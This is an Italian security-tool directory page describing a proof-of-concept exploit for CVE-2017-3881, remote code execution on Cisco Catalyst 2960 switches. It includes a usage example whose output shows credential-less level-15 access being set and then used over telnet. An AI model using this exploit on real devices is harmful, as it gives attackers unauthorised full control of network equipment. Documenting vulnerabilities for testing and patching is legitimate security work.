Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-3881 — crediti a artkond | Kitploit
Strumenti/GitHubGitHub/1337g/cve-2017-3881
Sicurezza Sistemi EmbeddedFramework di ExploitAnalisi delle VulnerabilitàExploitSicurezza di RetePenetration Testing
GitHub1337g/cve-2017-3881

CVE-2017-3881

crediti a artkond

Vedi Repository
228 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

CVE-2017-3881 Esecuzione di codice remoto su Cisco IOS

Questo repository contiene il codice Proof-Of-Concept per sfruttare la vulnerabilità di esecuzione remota di codice divulgata da Cisco Systems il 17 marzo 2017 - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp

Descrizione

Il resoconto dell'exploit è disponibile qui - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/

Il codice dell'exploit RCE è disponibile per il modello di switch Cisco Catalyst 2960. Questo exploit dipende dal firmware. Sono supportate due versioni del firmware:

  • 12.2(55)SE1 C2960-LANBASEK9-M

  • 12.2(55)SE11 C2960-LANBASEK9-M

Il codice per il denial of service è disponibile come modulo Ruby di Metasploit. Dovrebbe funzionare per la maggior parte degli switch menzionati nell'avviso Cisco (conferma necessaria).

Esempio di utilizzo

root@kitploit:~
$ python c2960-lanbasek9-m-12.2.55.se11 192.168.88.10 --set
[+] Connection OK
[+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f'
[+] Sending cluster option
[+] Setting credless privilege 15 authentication
[+] All done
$ telnet 192.168.88.10
Trying 192.168.88.10...
Connected to 192.168.88.10.
Escape character is '^]'.

catalyst1#show priv
Current privilege level is 15

Autore

Artem Kondratenko https://twitter.com/artkond

Scarica lo strumento